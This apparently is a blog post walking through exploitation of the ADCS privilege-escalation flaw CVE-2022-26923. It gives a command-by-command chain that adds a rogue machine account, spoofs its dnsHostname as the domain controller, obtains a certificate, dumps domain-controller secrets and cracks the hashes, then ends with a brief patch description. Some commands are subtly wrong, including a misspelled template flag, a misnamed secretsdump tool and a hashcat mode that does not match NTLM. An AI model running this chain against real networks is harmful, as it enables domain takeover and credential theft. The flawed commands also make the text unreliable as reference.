Background
In this blog post, we will dive into the exploitation of Active Directory Certificate Service Privilege Escalation vulnability that originally discover by ly4k. More info can be found on his blog post.
Elements of ADCS
- ADCS: Active Directory Certificate Service
- PKI: public key infrastructure
- PKINIT: preauthentication mechanism for kerbero 5
- Certificate templete
- user templete
- UPN: userprincialname (unqiue) - machine templete
- dnsHostname
- user templete
Main issue
- dnsHostname isn’t validated when requesting certificate
Steps of exploitation
- find ADCS service
1
crackmapexec ldap <dc_ip> -u <domain_user> -p <password> -M ADCS
- check machineAccountQuote
1
crackmapexec ldap <dc_ip> -u <domain_user> -p <password> -M maq
- create a new machine to the domain, specify “SAMR” method if not LDAPS. There is not SPN attribute if machine is added by “SAMR” protocal.
1
impacket-addcomputer '<adcs_servername>.<domain_name>\<domain_user>:<password>' -method SAMR -computer-name '<new_machine_name>' -computer-pass '<password>'
- change dnsHostname properity
1
2set-AdComputer <new_machine> -dnsHostname $null
set-AdComputer <new_machine> -dnsHostname <Domain_Controller>.<domain_name> - request certificate
1
certipy req '<domain_name>/<new_machine_name>$:<password>@<adcs_servername>' -templete Machine -ca <ca_name>
- autenciation to kerbero
1
certipy auth -pfx <pfx_file>
- dump secrets
1
impacket-secretdump '<Domain_Controller>' -just-dc-user -k -no-pass -dc-ip <dc_ip>
- crack NTLM hash
1
hashcat -m 1800 <ntlm_hash_file> rockyou.txt
Mitigation
Microsoft Security Update for CVE-2022-26923
- in this patch, new object ID was introduced in new certificate to further fingerprint the user
- validation of dnsHostname added, only allow you to use the one matching the computer name